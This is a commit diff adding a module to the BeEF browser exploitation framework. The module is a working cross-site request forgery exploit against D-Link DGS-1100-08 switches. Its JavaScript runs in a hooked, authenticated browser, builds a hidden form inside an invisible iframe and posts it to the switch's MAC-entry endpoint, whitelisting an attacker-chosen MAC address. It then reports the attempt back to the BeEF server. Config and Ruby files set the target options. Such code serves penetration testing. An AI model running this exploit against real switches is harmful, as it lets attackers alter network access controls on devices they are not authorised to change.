Adding DLink DGS 110 DB Whitelist module

2017-02-23 19:23:45 -06:00
parent 915869f23a
commit 37b83e3a38
3 changed files with 87 additions and 0 deletions
--- a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js
+++ b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js
@@ -0,0 +1,51 @@
+//
+// Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  // Hooked browser must be authenticated to switch.
+  var base = '<%= @base %>';
+  var port = '<%= @port %>';
+  var mac = '<%= @mac %>';
+  var vlanid = '<%= @vlanid %>';
+
+  var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
+
+  var form = document.createElement('form');
+  form.setAttribute('action', base + "/cgi/mac_entry_add.cgi");
+  form.setAttribute('method', 'POST');
+
+  var input = null;
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'fwdport');
+  input.setAttribute('value', port);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'vid');
+  input.setAttribute('value', vlanid);
+  form.appendChild(input);
+
+  input = document.createElement('input');
+  input.setAttribute('type', 'hidden');
+  input.setAttribute('name', 'macaddr');
+  input.setAttribute('value', mac);
+  form.appendChild(input);
+
+  dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
+  form.submit();
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(dlink_dgs_iframe);
+  }
+
+  setTimeout("cleanup()", 15000);
+});
+
--- a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/config.yaml
+++ b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        Dlink_dgs_1100_fdb_whitelist_csrf:
+            enable: true
+            category: ["Exploits", "Switch"]
+            name: "DLINK DGS 1100-08 FDB Whitelist CSRF"
+            description: "Adds a MAC Address to the FDB Static Unicast Whitelist."
+            authors: ["Nick Starke"]
+            target:
+                working: ["ALL"]
--- a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/module.rb
+++ b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/module.rb
@@ -0,0 +1,21 @@
+#
+# Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Dlink_dgs_1100_fdb_whitelist_csrf < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name' => 'base', 'ui_label' => 'Switch web root', 'value' => 'http://10.90.90.90'}, 
+        {'name' => 'port', 'ui_label' => 'Switch port to add MAC address access to', 'value' => '1'}, 
+        {'name' => 'mac', 'ui_label' => 'MAC address to whitelist', 'value' => '00-00-00-00-00-00'},
+	{'name' => 'vlanid', 'ui_label' => 'VLAN to add rule to', 'value' => '1'}
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end